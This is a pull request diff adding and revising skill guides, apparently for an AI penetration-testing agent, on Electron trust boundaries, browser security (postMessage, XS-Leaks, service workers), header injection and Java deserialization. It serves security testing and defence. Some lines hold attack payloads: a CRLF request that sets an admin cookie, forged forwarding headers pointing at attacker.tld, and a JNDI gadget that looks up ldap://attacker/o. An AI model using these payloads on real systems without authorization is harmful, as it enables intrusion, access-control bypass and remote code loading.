### PR TITLE
Add semantic browser and Electron security skills

### DIFF
--- a/strix/skills/README.md
+++ b/strix/skills/README.md
@@ -43,10 +43,13 @@ Notable source-aware skills:
 - `source_aware_sast` (custom): semgrep/AST/secrets/supply-chain static triage workflow
 - `dependency_cve_scanning` (custom): trivy-based SCA workflow for reporting known dependency CVEs via `create_dependency_report`
 - `npx_confusion` (custom): npx/npm exec/bunx fallback and adjacent package-runner identity confusion, with runner-specific registry and reporting gates
+- `semantic_confusion` (vulnerabilities): cross-boundary parser, normalization, and representation mismatch analysis
 - `agentic_system_security` (vulnerabilities): effective-authority and MCP/tool ecosystem security testing
+- `browser_security` (vulnerabilities): browsing-context, postMessage, XS-Leaks, service-worker, and cross-origin state-machine testing
 - `azure` (cloud): Azure and Microsoft Entra privilege, PIM, workload identity, and cross-plane escalation analysis
 - `infrastructure_lifecycle` (reconnaissance): abandoned or mutable external dependencies such as update endpoints, MX, storage, and control domains
 - `argument_injection` (vulnerabilities): shell-free CLI option smuggling, secondary argument-file parsing, and platform-specific argv transformation boundaries
+- `electron_desktop_apps` (technologies): Electron renderer-to-native trust boundaries, preload/IPC exposure, and navigation analysis
 
 Notable LLM security skills:
 - `llm_applications` (technologies): end-to-end OWASP 2026 LLM01-LLM10 coverage across models, RAG, vectors, agents, tools, outputs, supply chain, and resource controls

--- a/strix/skills/custom/source_aware_sast.md
+++ b/strix/skills/custom/source_aware_sast.md
@@ -105,6 +105,18 @@ tree-sitter parse -q <file>
 
 Use outputs to improve route/symbol/sink maps for subsequent targeted scans.
 
+## Cross-Component Semantic Mapping
+
+Pattern scanners find local sinks but often miss a security decision in one component followed by a different interpretation in another. For complex middleware, proxies, frameworks, and plugin systems:
+
+1. Identify shared request/context fields and every writer/reader.
+2. Order the readers and writers by lifecycle phase: parse, route, authenticate, rewrite, authorize, dispatch, render.
+3. Mark fields whose semantic type changes (URL/path, MIME/handler, alias/package, external/internal route).
+4. Trace normal, error, retry, subrequest, and internal-redirect paths separately.
+5. Compare the representation checked by security code with the representation consumed by the final sink.
+
+Load `semantic_confusion` when this graph reveals overloaded fields, multiple parsers, normalization steps, or protocol translation.
+
 ## Resolution and Namespace Risks
 
 In repositories with developer tooling, plugins, templates, or package runners, inspect lookup order rather than only dependency versions:

--- a/strix/skills/technologies/electron_desktop_apps.md
+++ b/strix/skills/technologies/electron_desktop_apps.md
@@ -1,0 +1,181 @@
+---
+name: electron-desktop-apps
+description: Test Electron desktop applications across renderer, preload, IPC, main-process, navigation, custom-protocol, storage, permission, and update trust boundaries; use for packaged Electron apps, ASAR review, web-to-native capability analysis, and Electron-specific exploit chains
+---
+
+# Electron Desktop Applications
+
+Use this skill for Electron applications. Other webview desktop frameworks may share the high-level web-to-native trust question, but their bridge, sandbox, update, and process APIs differ; do not apply Electron-specific conclusions to NW.js, CEF, Tauri, or Wails without mapping that framework separately.
+
+Pair this skill with `browser_security` for browser state and navigation, `xss` for renderer injection, `argument_injection` for native subprocess launches, and `insecure_deserialization` or `rce` for a main-process sink.
+
+## Architecture and Authority Map
+
+Inventory each security principal and the capabilities crossing between them:
+
+```text
+origin + document + frame
+  -> renderer JavaScript
+  -> preload isolated world
+  -> contextBridge API
+  -> IPC channel
+  -> sender/argument/identity checks
+  -> main process or utility process
+  -> filesystem, process, credential, media, network, update, or OS action
+```
+
+Record:
+
+- Electron, Chromium, Node, and application versions
+- packaging form, `app.asar`, unpacked resources, entry point, and fuses
+- every `BrowserWindow`, `WebContentsView`, `<webview>`, session/partition, and child window
+- `webPreferences`: `preload`, `nodeIntegration`, `contextIsolation`, `sandbox`, `webSecurity`, `allowRunningInsecureContent`, experimental features, and subframe/worker integration
+- every preload export and every `ipcMain.handle`/`ipcMain.on` consumer
+- origins/documents/frames that can reach each exported API
+- custom protocols, deep links, navigation helpers, permissions, downloads, storage, and update channels
+
+Do not infer authority from a setting or channel name alone. Follow one request from renderer input to the main-process side effect and record each authorization decision.
+
+## Package and Source Reconnaissance
+
+Extract the application bundle with a reviewed, version-pinned ASAR implementation or inspect an already unpacked `resources/app` tree. Locate `package.json#main`, preload paths, build metadata, Electron version, native modules, and update configuration.
+
+Search for:
+
+```text
+BrowserWindow  WebContentsView  webviewTag  webPreferences
+preload  contextBridge.exposeInMainWorld  ipcRenderer
+ipcMain.handle  ipcMain.on  webContents.ipc
+will-navigate  will-frame-navigate  will-redirect
+setWindowOpenHandler  loadURL  loadFile  openExternal
+setPermissionRequestHandler  registerSchemesAsPrivileged
+setAsDefaultProtocolClient  open-url  second-instance
+autoUpdater  electron-updater
+```
+
+Treat decompiled or bundled JavaScript as a hypothesis when source maps, minification, generated IPC bindings, or runtime feature flags can change the installed behavior.
+
+## Preload and Context-Bridge Analysis
+
+A preload script has privileged Electron/Node access even when `nodeIntegration` is disabled. With context isolation, it can still expose selected functions and values into the page's main world.
+
+Classify every export:
+
+- narrow operation with fixed channel and validated arguments
+- caller-selected channel or event name
+- direct exposure of `ipcRenderer`, Node/Electron modules, filesystem/process objects, or mutable privileged objects
+- callback/event registration that leaks the raw IPC event or privileged objects
+- secret/session/storage access
+- operation whose authorization exists only in renderer JavaScript
+
+A generic `send(channel, ...)` or `invoke(channel, ...)` bridge expands the renderer's candidate capability set, but the registered handler list is not the ACL. For each handler, inspect:
+
+- `event.senderFrame` URL/origin and frame identity validation
+- expected `webContents`, window, session/partition, and application state
+- user/tenant authorization and request provenance
+- argument schema, paths, URLs, command options, and object deserialization
+- result exposure and event subscriptions
+
+An IPC handler's existence does not prove an untrusted frame can invoke it successfully.
+
+## Navigation and Window Boundaries
+
+Web preferences belong to a `webContents`; navigation does not automatically turn a privileged window into an ordinary browser tab. A configured preload can run for newly loaded documents and expose its bridge to content that was never intended to receive it.
+
+Map all navigation causes:
+
+- user- or page-initiated main-frame navigation (`will-navigate`)
+- subframe navigation (`will-frame-navigate`)
+- server redirects (`will-redirect`)
+- new windows and popups (`setWindowOpenHandler`)
+- application calls to `loadURL`, `loadFile`, history APIs, or routing helpers
+- custom-protocol redirects and external-link handlers
+
+`will-navigate` does not cover every programmatic navigation, so the event's presence is not complete enforcement.
+
+Parse candidate URLs with `URL` and compare explicit protocol, origin/host, port, and path rules. Do not use string-prefix checks such as `startsWith("https://trusted.example")`. Apply the same canonical policy to initial loads, redirects, frames, popups, programmatic loads, and externally opened URLs.
+
+Before calling `shell.openExternal`, validate the scheme and complete destination expected by the feature. Treat `file:`, custom schemes, handler-specific arguments, credentials in URLs, and ambiguous encodings as separate cases.
+
+## Node, Isolation, and Sandbox Settings
+
+- `nodeIntegration: true` in a renderer that can execute untrusted script directly exposes Node capability and commonly turns renderer injection into native code execution.
+- `contextIsolation: false` weakens the boundary between page and preload worlds but is not, by itself, proof of native code execution.
+- `sandbox: false` removes Chromium process isolation; determine which preload or renderer capabilities become reachable rather than reporting the flag alone.
+- `webSecurity: false`, `allowRunningInsecureContent`, permissive experimental features, and unsafe `<webview>` preferences change separate browser boundaries and must be traced to an exploit path.
+- `nodeIntegrationInSubFrames` and preload injection into frames require frame-by-frame sender and origin analysis.
+
+Record Electron-version defaults. A missing explicit setting can mean different behavior on different major releases.
+
+## Custom Protocols and Deep Links
+
+Treat OS-delivered URLs and second-instance command lines as attacker-controlled inputs:
+
+```text
+OS handler / browser / document
+  -> custom scheme or argv
+  -> URL/argument parsing
+  -> application router
+  -> renderer navigation or native operation
+```
+
+Test authority and parser boundaries for host/path normalization, duplicate parameters, encoding depth, file paths, option injection, and cross-profile/account routing. Confirm which application instance and user session receives the event.
+
+For custom application protocols, record whether the scheme is registered as secure, standard, CORS-enabled, stream-capable, or privileged, and how that affects origin and storage behavior.
+
+## Permissions, Storage, and Secrets
+
+Map session permission handlers for media, notifications, geolocation, clipboard, display capture, USB/HID/serial, filesystem access, and external protocols. Verify decisions use the requesting frame/origin and cannot be inherited from a more trusted window.
+
+Inventory secrets and capability-bearing state reachable from renderer or preload code:
+
+- tokens, cookies, session identifiers, recovery material, and encryption keys
+- IndexedDB, local/session storage, cookies, cache, filesystem databases, and keychain wrappers
+- local service ports, named pipes, Unix sockets, and authentication material
+
+At-rest encryption does not protect data when the renderer can retrieve the key or ask a privileged bridge to decrypt it.
+
+## Updates and Native Extensions
+
+Trace the update pipeline as an executable supply chain:
+
+- feed URL and channel selection
+- TLS identity, redirects, proxy behavior, and metadata parsing
+- artifact signature and publisher verification
+- version/rollback policy and staged update state
+- native modules, helper binaries, installers, and post-update hooks
+
+An attacker-controlled feed is not automatically native code execution if independent artifact signatures are mandatory. Conversely, HTTPS does not compensate for missing artifact authenticity or unsafe rollback behavior.
+
+## Validation
+
+- Record the exact installed build, Electron version, preferences, preload, handler, and current document/frame origin.
+- Demonstrate the complete path from attacker-controlled input or renderer state to the main-process operation.
+- Capture sender-validation and argument-validation outcomes, not only successful IPC transport.
+- Re-test after cross-origin navigation, redirect, frame creation, window creation, and session/profile changes.
+- Separate renderer script execution, bridge access, accepted IPC, privileged data access, filesystem/process control, and native code execution.
+
+## False Positives
+
+- A preload or handler exists but the tested document/frame cannot reach it.
+- A channel is registered but rejects the sender, identity, state, or arguments.
+- `contextIsolation` or sandboxing is disabled without a reachable privileged API.
+- Navigation is blocked on user links but still possible through application code, or vice versa.
+- A remote page has no preload export, Node integration, IPC route, or privileged permission.
+- An update feed is mutable but every artifact and version transition is independently authenticated.
+- A secret-looking value is scoped to synthetic/test data or cannot authorize any downstream action.
+
+## Remediation
+
+- Load local application UI and isolate remote content in an unprivileged `WebContentsView` or external browser.
+- Keep Node integration disabled, context isolation enabled, and renderer sandboxing enabled.
+- Expose narrow preload APIs with fixed operations and strict schemas.
+- Validate every IPC sender frame, application identity, authorization context, and argument in the main process.
+- Parse and allowlist navigation destinations consistently across every navigation path.
+- Restrict permissions per session and requesting origin.
+- Keep credentials and encryption keys outside renderer reach.
+- Authenticate update metadata and artifacts, enforce rollback policy, and pin publishers.
+
+## Summary
+
+Electron security depends on which document and frame can reach which native capability. Map navigation, preload exports, IPC sender checks, permissions, storage, protocols, and updates as one authority graph, then validate the entire path to the privileged operation.

--- a/strix/skills/vulnerabilities/browser_security.md
+++ b/strix/skills/vulnerabilities/browser_security.md
@@ -1,0 +1,192 @@
+---
+name: browser-security
+description: Browser-internals security testing for browsing-context relationships, postMessage, client-side path traversal, XS-Leaks, service workers, Web Workers, navigation behavior, CSP interactions, caches, and cross-origin state machines
+---
+
+# Browser Security
+
+Use this skill when exploitability depends on browser behavior beyond a basic HTML injection. Model origins, browsing contexts, navigation history, workers, caches, router decoding, request metadata, and user activation as explicit state.
+
+Pair this skill with `xss`, `oauth`, `open_redirect`, `csrf`, or `semantic_confusion` when one of those is the primary vulnerability class. For an Electron renderer with a preload or IPC bridge, load `electron_desktop_apps` to analyze whether navigation and origin transitions reach native capability.
+
+## Safety Boundary
+
+- Use a controlled browser profile, synthetic account/data, explicit target allowlist, and a fresh assessment-specific proxy/CA when interception is required.
+- Redact tokens, cookies, message contents, storage values, and personal data from console logs, captures, recordings, and reports.
+- Treat oversized URLs/headers, cookie inflation, redirect loops, cache exhaustion, and high-rate timing trials as resource/denial-of-service tests; run them only with strict ceilings in a restartable lab.
+- Do not attempt to set or spoof browser-generated `event.origin`. Vary the sender URL and record the serialized origin supplied by the browser.
+- Restore monkey-patched browser APIs and unregister test workers/caches after validation.
+
+## Browser State Model
+
+For each relevant page or worker, record:
+
+- origin and site, including transitions after navigation
+- top-level window, opener, parent, child frames, named contexts, and retained references
+- sandbox flags, CSP `frame-ancestors`, COOP, COEP, CORP, and X-Frame-Options
+- service-worker controller and scope
+- storage access: cookies, local/session storage, IndexedDB, Cache API
+- navigation/history entries and redirect type: HTTP, JavaScript, form, meta refresh
+- user-activation and interaction requirements
+- browser family/version and enabled experimental features
+
+Draw the context graph. Security checks on `event.origin`, `event.source`, or a popup reference are meaningful only when the lifetime and ownership of that context are understood.
+
+## High-Value Surfaces
+
+### postMessage and Window Relationships
+
+- Enumerate listeners and senders; record message schema, origin check, source check, and reachable sinks/actions.
+- Validate origins after URL parsing and canonicalization, not with raw-string regexes.
+- Test numeric/alternate IP forms, userinfo, path masquerading as a host suffix, and redirects.
+- Treat predictable `window.open()` target names and iframe names as potentially shared namespace entries. Confirm reuse within the same browsing-context group, opener chain, COOP state, and relevant navigation/message timing.
+- Check whether a blocked intermediate frame leaves a useful browsing-context relationship intact.
+- Use random per-flow names or `_blank` with `noopener` where an opener relationship is unnecessary.
+
+### Client-Side Path Traversal
+
+Trace the complete source-to-request pipeline:
+
+```text
+browser URL -> router parser -> route/query/hash accessor -> app interpolation -> fetch/XHR -> final normalized URL
+```
+
+- Test path parameters, query parameters, and hashes independently.
+- Determine exactly where `%2F`, `%5C`, `%2E`, and double-encoded forms decode or re-encode.
+- Instrument `fetch`, XHR, Axios, router navigation, and server-side fetch wrappers to capture the final URL.
+- Escalate only after identifying the sink: state-changing API for CSRF-like impact, HTML/attachment response rendered in an unsafe sink for XSS, or server-side fetch for SSRF.
+- Do not assume the same framework API behaves identically in client components, server components, and route handlers.
+
+### XS-Leaks and Cross-Origin Oracles
+
+Inventory observable signals that do not require reading the cross-origin response:
+
+- load/error events for script, image, stylesheet, frame, media, and module elements
+- timing, connection reuse, cache state, redirect count, and navigation success
+- window/frame count, focus, history length, and resource dimensions
+- browser-generated error pages and status-dependent behavior
+- request headers such as `Sec-Fetch-Dest`, `Sec-Fetch-Mode`, and `Origin`
+
+Test controls such as ORB, CORP, COEP, and MIME enforcement. A service worker or alternate fetch path can change request destination metadata and therefore change whether a blocked response becomes a network error or an empty response. Validate the oracle across authenticated and unauthenticated control cases.
+
+### Service Workers and Caches
+
+- Map service-worker registration scope, update lifecycle, controller acquisition, and fetch handlers.
+- Inspect Cache API keys and responses; determine whether HTML or JavaScript is served directly from a writable cache.
+- Test whether a constrained script context can poison app-managed cache entries later consumed by a normal page or service worker.
+- Treat service-worker persistence as high impact, but prove registration/control scope and update survivability.
+- Compare a direct subresource request with the same request proxied through `fetch(event.request)`; request destination and mode can differ.
+
+### Web Workers and Constrained Script Execution
+
+When script runs inside a worker, inventory capabilities instead of dismissing it as low impact:
+
+- credentialed same-origin `fetch` for data access and state changes
+- `postMessage` gadgets into the main page
+- IndexedDB and Cache API shared with other same-origin contexts
+- Blob construction and object URLs
+- import mechanisms, WebSocket, and available browser-specific APIs
+
+Prove the strongest reliable capability first. If escalation requires a user gesture, document the exact gesture, timing, browser, and visibility rather than calling it zero-click XSS.
+
+### Navigation and Redirect Control
+
+- Distinguish HTTP 30x, script navigation, form submission, meta refresh, and popup navigation.
+- Test invalid or blocked URL schemes and WAF-generated error pages only when they support a real flow. Oversized URLs/headers, cookie-path-specific header inflation, redirect limits, and navigation throttling are restartable-lab-only tests with strict size/iteration limits and health checks.
+- A sandbox inherited by a new top-level context can selectively block forms, scripts, popups, or navigation; enumerate the exact flag set.
+- Preserve and inspect history when a built-in error page replaces the active document; do not assume the errored URL is lost.
+
+### CSP and Browser Parsing
+
+- Evaluate the delivered policy on the exact response, including redirects and error/API/static paths.
+- Map nonces, hashes, `strict-dynamic`, allowed schemes, trusted script gadgets, `base-uri`, `frame-ancestors`, and Trusted Types.
+- Test parser namespaces and repairs in HTML, SVG, and MathML. A protected attribute or sanitizer rule in the HTML namespace may behave differently after namespace transitions.
+- Treat scriptless disclosure of a nonce or trusted URL as a primitive; prove a second controllable sink before claiming bypass.
+- For response splitting, consider whether a same-origin endpoint can be turned into a script resource with a controlled body length or framing.
+
+### JavaScript Gadget Discovery
+
+- When direct calls are blocked, inspect implicit coercions (`toString`, `valueOf`, iterators, getters, proxies) and callbacks invoked by accessible library functions.
+- Search for functions whose `this` object and arguments can be attacker-shaped.
+- Build a bounded harness to enumerate reachable globals and observe property reads/calls; avoid assuming one library gadget is universal.
+- Validate the complete call chain to a dangerous sink such as navigation, HTML insertion, `eval`, `Function`, or a privileged API.
+
+## Reconnaissance
+
+### Runtime Instrumentation
+
+Instrument in a controlled browser session:
+
+```javascript
+const realFetch = window.fetch;
+window.fetch = (...args) => {
+  const input = args[0];
+  const rawUrl = typeof input === 'string' ? input : input.url;
+  const url = new URL(rawUrl, location.href);
+  const method = args[1]?.method || input?.method || 'GET';
+  console.log('fetch', {method, origin: url.origin, path: url.pathname});
+  return realFetch(...args);
+};
+
+window.addEventListener('message', e => {
+  const keys = e.data && typeof e.data === 'object' ? Object.keys(e.data) : [];
+  console.log('message', {origin: e.origin, sourceMatches: e.source === window.opener, keys});
+}, true);
+```
+
+Use the wrapper only in the controlled profile and restore `window.fetch = realFetch` afterward. Do not log bodies, message values, credentials, or query strings.
+
+Also inspect DevTools network initiators, service workers, storage, CSP violations, frame tree, and navigation history. Use raw browser behavior for validation; command-line HTTP clients cannot reproduce origin/window/worker semantics.
+
+### Source Review
+
+- Search for `postMessage`, message listeners, `window.open`, named targets, opener/parent access, frame creation, and sandbox attributes.
+- Search for router parameter APIs flowing into `fetch`, Axios, navigation, or HTML rendering.
+- Search for service-worker registration, Cache API writes, worker constructors, Blob URLs, and dynamic imports.
+- Search for raw HTML sinks and trust escape hatches in every supported frontend framework.
+- Compare CSP and framing headers across document, API, static, callback, redirect, and error routes.
+
+## Testing Methodology
+
+1. **Define the browser state** - Origin/site, context graph, policies, workers, storage, and activation.
+2. **Identify a source and observable sink** - Message, URL component, cache entry, navigation, load/error event, or implicit call.
+3. **Trace transformations** - URL parsing, framework decode, browser normalization, request destination, and document replacement.
+4. **Build paired controls** - Same-origin/cross-origin, status success/error, worker/direct, unique/predictable window name, encoded/raw path.
+5. **Prove the primitive** - Data transfer, path change, state oracle, cache modification, or context capture.
+6. **Escalate deliberately** - Chain to a privileged action, sensitive disclosure, SSRF, or executable DOM sink.
+7. **Cross-browser check** - At minimum record Chromium/Firefox/Safari applicability when the primitive is browser-specific.
+8. **State interaction requirements** - Click, drag, popup permission, timing window, login state, and visual deception.
+
+## Validation
+
+1. Capture the context graph and relevant policies at exploit time.
+2. Show the exact browser-parsed origin or final request URL, not just the attacker-supplied string.
+3. For postMessage, prove both message origin and source/context ownership.
+4. For XS-Leaks, repeat randomized success/failure trials and quantify separation and noise.
+5. For workers/caches, show which later context consumes the modified data.
+6. For client-side traversal, capture the final network request and the security-relevant response/action.
+7. For interaction-dependent chains, provide a screen recording or deterministic event trace.
+
+## False Positives
+
+- A message reaches a listener but fails schema, origin, source, or state validation before any action
+- A router decodes traversal characters but the value never reaches a URL/path sink
+- Different load/error behavior caused by unstable network rather than protected state
+- Worker script execution with no sensitive API, shared state, main-thread gadget, or meaningful action
+- CSP nonce disclosure without a controllable way to reuse it in an executable sink
+- Named-window collision blocked by origin scoping, randomized names, COOP, or `noopener`
+- Browser-specific behavior reported without the required version, flag, or user interaction
+
+## Pro Tips
+
+1. Treat browsing-context names as attacker-contestable identifiers unless randomized.
+2. Query parameters are usually decoded automatically; path parameters vary by router and execution context.
+3. Compare request metadata, not just URLs. Service workers can alter destination/mode semantics.
+4. A strict origin check does not compensate for attacker control of the supposedly trusted window reference.
+5. Error pages, redirects, and blocked frames still mutate history and context relationships.
+6. Keep browser-version claims narrow and retest; these behaviors change faster than server-side primitives.
+7. Prefer a small state-machine explanation over a large payload catalog.
+
+## Summary
+
+Browser exploitation is state-machine exploitation. Map origins, context references, policies, workers, storage, navigation, and decoding as one system. Prove each state transition with browser evidence, then chain only the primitives that survive the target's browser and interaction constraints.

--- a/strix/skills/vulnerabilities/header_injection.md
+++ b/strix/skills/vulnerabilities/header_injection.md
@@ -5,7 +5,7 @@ description: HTTP header injection testing covering CRLF / response splitting, c
 
 # HTTP Header Injection
 
-Header injection turns user input into protocol-level control: response splitting, cache poisoning, session fixation, authentication bypass, and request smuggling all trace back to a server-controlled header value that wasn't normalized. The bug usually lives in middle layers — frameworks that copy a request value into a response header, proxies that trust forwarded headers, caches keyed on something the attacker influences. Treat any user-controlled value that reaches a header as code-execution-equivalent until proven otherwise.
+Header injection turns user input into protocol-level control: response splitting, cache poisoning, session fixation, authentication bypass, and downstream parser confusion can trace back to a server-controlled header value that was not normalized. The bug usually lives in middle layers — frameworks that copy a request value into a response header, proxies that trust forwarded headers, caches keyed on something the attacker influences. Impact depends on which downstream component consumes the injected field and how.
 
 ## Attack Surface
 
@@ -62,7 +62,7 @@ Header injection turns user input into protocol-level control: response splittin
 
 ## Key Vulnerabilities
 
-### CRLF Response Splitting and Smuggling
+### CRLF Response Splitting
 
 Inject `\r\n\r\n` to terminate the current response and prepend a second attacker-controlled response. Cache or downstream proxy may key on the first response and serve the second to other users.
 
@@ -70,7 +70,7 @@ Inject `\r\n\r\n` to terminate the current response and prepend a second attacke
 GET /redirect?to=foo%0d%0aSet-Cookie:%20admin=1%0d%0a%0d%0a<html>poisoned</html> HTTP/1.1
 ```
 
-Request smuggling is the same primitive at the request layer: inject a header that causes the proxy and backend to disagree on message framing — most commonly conflicting `Content-Length` and `Transfer-Encoding`, or two `Content-Length` headers with different values. Backend reads one request, frontend reads a different one; the leftover bytes become a smuggled request prepended to the next victim's connection.
+Request smuggling is a separate request-boundary vulnerability involving disagreement between two HTTP parsers, not simply response header injection at the request layer. Load `http_request_smuggling` when conflicting lengths, transfer coding, HTTP/2 downgrades, or connection desynchronization are in scope.
 
 ### Cache Poisoning
 
@@ -106,16 +106,23 @@ The `X-Forwarded-*` family is informational — there is no protocol guarantee a
 - `X-Forwarded-For: 127.0.0.1` to bypass IP allowlists or rate limits keyed on client IP
 - `X-Forwarded-Proto: https` to satisfy "HTTPS-only" checks while still using HTTP
 - `X-Forwarded-Host: attacker.tld` for the Host-confusion variants above
-- `X-Real-IP`, `Client-IP`, `True-Client-IP`, `CF-Connecting-IP`, `Forwarded` (RFC 7239) — same primitive, different header names; spray all of them
+- `X-Real-IP`, `Client-IP`, `True-Client-IP`, `CF-Connecting-IP`, `Forwarded` (RFC 7239) — same trust class under different conventions; select evidence-supported variants for the observed proxy/CDN stack
 - `X-Original-URL` / `X-Rewrite-URL` (IIS, ASP.NET) — server-side URL rewriting after auth check, classic admin-panel auth bypass
 
 ### Content-Type / Encoding Confusion
 
 - Inject `Content-Type: text/html` into an endpoint that returned JSON; browsers may sniff and render → XSS
-- Inject `charset=utf-7` in `Content-Type` for legacy XSS via UTF-7-encoded payloads
 - Inject `Content-Disposition: inline` to switch a download into in-page rendering
-- Inject `Content-Encoding: gzip` without actually compressing — clients decode-fail and may reveal raw response bytes in error paths
 - *Absence* of `X-Content-Type-Options: nosniff` is what enables the sniffing attacks above; the header is a hardening control, not an attack surface — but if a server sets it inconsistently across endpoints, target the ones that don't
+- Compare MIME validators with browser parsing of duplicate or comma-joined `Content-Type` values. Record first/last valid member behavior and invalid-parameter recovery for each consumer.
+
+### Internal Redirect and Handler Confusion
+
+- Determine whether CGI/FastCGI/WSGI-style response headers can trigger an internal redirect instead of an external response.
+- Trace which request fields survive the redirect: content type, handler, method, authorization result, path, and environment.
+- Test whether response metadata is reused as an internal handler, proxy target, template type, or interpreter selection.
+- Compare direct access controls with the internally dispatched resource. A protected URL may be unreachable directly while the same handler is invokable through a clean internal redirect.
+- Treat CRLF injection and response-controlling SSRF as possible inputs to this chain, then validate handler selection before using a privileged handler.
 
 ### XSS via Response Headers
 
@@ -165,8 +172,9 @@ The `X-Forwarded-*` family is informational — there is no protocol guarantee a
 4. **Probe forwarding headers** — spoof `X-Forwarded-For`, `X-Real-IP`, `True-Client-IP`, `CF-Connecting-IP` against IP-restricted endpoints (admin, rate-limited)
 5. **Test cache key / response content split** — find inputs that change the body but not the cache key; confirm a second request from a different session sees the poisoned response
 6. **Test method override** — `X-HTTP-Method-Override` paired with state-changing endpoints reachable via POST or GET
-7. **Test request smuggling pairs** — conflicting `Content-Length` and `Transfer-Encoding`, two `Content-Length` headers, malformed chunked encoding, against any frontend → backend pair
+7. **Route framing discrepancies** — if evidence indicates request-boundary disagreement, switch to `http_request_smuggling`
 8. **Cross-protocol** — replay payloads over HTTP/1.1 and HTTP/2; diff behavior
+9. **Trace internal reprocessing** — where response headers can cause subrequests/internal redirects, diff retained fields and final handler selection
 
 ## Validation
 
@@ -174,8 +182,8 @@ The `X-Forwarded-*` family is informational — there is no protocol guarantee a
 2. Capture a password-reset / OAuth link pointing at attacker-controlled host — proves Host injection
 3. Demonstrate the same endpoint returning different auth decisions with and without a forged forwarding header
 4. For response splitting: show a downstream cache or proxy serving the injected second response to an unrelated request
-5. For request smuggling: show one victim request seeing data from a different request appended (not just timing or single-shot anomaly)
-6. All findings should produce a durable artifact (cached response, sent email, log entry, session change) — transient anomalies are not validation
+5. All findings should produce a durable artifact (cached response, sent email, log entry, session change) — transient anomalies are not validation
+6. For internal redirects, capture both the injected response metadata and the final internally selected route/handler
 
 ## False Positives
 
@@ -183,7 +191,6 @@ The `X-Forwarded-*` family is informational — there is no protocol guarantee a
 - `X-Forwarded-*` reflected back but only used for logging — not a security boundary, may not be exploitable
 - Browsers blocking `Location: javascript:` or `Location: data:` — capability exists in the protocol but most modern browsers refuse to navigate
 - CRLF appearing in response headers but stripped by an outer proxy before reaching any client or cache
-- Request smuggling indicators that turn out to be normal pipelining or keep-alive behavior
 
 ## Impact
 
@@ -192,7 +199,6 @@ The `X-Forwarded-*` family is informational — there is no protocol guarantee a
 - Auth bypass on endpoints trusting forwarding headers
 - Session fixation and cookie tossing leading to account hijack
 - Open redirect for phishing / OAuth `redirect_uri` abuse
-- Request smuggling — one victim's request reads another victim's response, including auth headers and cookies
 - WAF / detection bypass via header-name and encoding tricks
 
 ## Pro Tips
@@ -200,7 +206,7 @@ The `X-Forwarded-*` family is informational — there is no protocol guarantee a
 1. The fastest win is usually Host / `X-Forwarded-Host` in a password-reset or OAuth flow — try first, costs one request
 2. For cache poisoning, find the *unkeyed* input first (header that influences body but not cache key); the rest follows
 3. `X-HTTP-Method-Override` is high-yield against backends that route on it before checking method-based auth — most useful from server-side / non-browser callers (it triggers CORS preflight in a browser, so not a CSRF primitive)
-4. Smuggling lives at the boundary — identify the proxy → backend pair (CDN → origin, ingress → service) and target the framing disagreement
+4. If a header test exposes message-boundary disagreement, switch to the dedicated request-smuggling workflow and identify the proxy → backend pair
 5. `X-Original-URL` / `X-Rewrite-URL` against IIS / ASP.NET admin endpoints is still a high-yield bypass
 6. Before claiming a CRLF win, verify the second line landed as a real header in the cache or downstream consumer — many servers strip CRLF silently
 7. Outbound email flows are a separate but related surface — user input flowing into SMTP headers (To, Cc, Subject, Reply-To) is its own injection class with the same root cause

--- a/strix/skills/vulnerabilities/insecure_deserialization.md
+++ b/strix/skills/vulnerabilities/insecure_deserialization.md
@@ -10,12 +10,15 @@ Insecure deserialization passes attacker-controlled byte streams or structured b
 ## Attack Surface
 
 **Formats**
-- Java: Java native serialization, XStream, JSON → object mappers (Jackson, Fastjson), YAML (SnakeYAML)
+- Java: Java native serialization, XStream, JSON → object mappers (Jackson, Fastjson), YAML (SnakeYAML), Hessian/Burlap, Kryo
 - Python: `pickle`, `yaml.load` (unsafe), `marshal`, shelve
 - PHP: `unserialize()`, Phar deserialization
 - .NET: `BinaryFormatter`, `Json.NET TypeNameHandling`, ViewState
 - Ruby: `Marshal.load`, YAML.load
 - Node.js: `node-serialize`, `unserialize.js` (less common; see prototype_pollution for merge bugs)
+
+**Transports and Containers**
+- Java RMI/JMX, HTTP/RPC endpoints, messaging protocols, queues, signed wrappers, and product-specific binary envelopes can carry one or more formats above
 
 **Input Locations**
 - Cookies, session tokens, hidden form fields
@@ -57,6 +60,22 @@ yaml.load       readObject(     TypeNameHandling    Marshal.load
 ["com.sun.rowset.JdbcRowSetImpl", {"dataSourceName":"ldap://attacker/o", "autoCommit":true}]
 ```
 When `enableDefaultTyping` or `@JsonTypeInfo` allows attacker-chosen types.
+
+**JNDI Pivots from Object Construction**
+
+JNDI injection is not itself a serialization format. It becomes part of this workflow when an attacker-selected type, setter, or gadget performs `Context.lookup()` during object construction or property population. `JdbcRowSetImpl` and some historical polymorphic JSON chains are examples; Log4j lookups reach JNDI through a different input path and should not be classified as deserialization.
+
+- Trace fields such as `dataSourceName`, `jndiName`, and `namingURL` into the exact lookup API and provider.
+- Record the accepted schemes/provider factories (`ldap`, `ldaps`, `rmi`, DNS URL context, or application-specific naming providers). A `dns://` value is not a universal oracle; it works only when the relevant DNS provider and lookup path are present.
+- Separate network lookup, remote object/reference processing, serialized LDAP attributes, remote codebase loading, and local object-factory invocation. Each is a different capability with different runtime controls.
+- JEP 290 filters incoming Java serialization graphs; it does not disable JNDI remote codebase loading. JNDI providers gained separate remote-class-loading and serialized-data controls across JDK updates, and current JDKs disable remote code downloading by default. Record the exact JDK build and relevant provider properties instead of using a single “modern Java” rule.
+- When remote class loading is unavailable, test whether the returned reference can reach a compatible **local** `ObjectFactory`, bean-property path, expression engine, script engine, or other class already present. Confirm exact class names, versions, module access, and trigger methods from the deployed classpath.
+
+**Hessian / Burlap**
+- Binary RPC formats deserialized by `HessianInput`/`Hessian2Input`. Attacker object graphs reach gadgets even though it is not native Java serialization.
+- Treat serializer version, allowed type metadata, constructors/setters invoked, collection/comparator behavior, and classpath as independent prerequisites.
+- Pair `semantic_confusion` when a proxy or route policy is expected to make the RPC endpoint unreachable.
+- Inspect the exact deployed libraries rather than relying on generic gadget labels; similar-looking Spring, Resin, Tomcat, XBean, EL, or Groovy classes are not interchangeable.
 
 ### Python Pickle
 
@@ -162,6 +181,8 @@ When `TypeNameHandling` != `None`.
 3. Check cookies named `JSESSIONID` alternatives, `.ASPXAUTH`, `laravel_session`, custom tokens
 4. In white-box, trace from `readObject`/`unserialize`/`pickle.loads` backward to source
 5. ViewState MAC off is still common on legacy ASP.NET — test early on `.aspx` apps
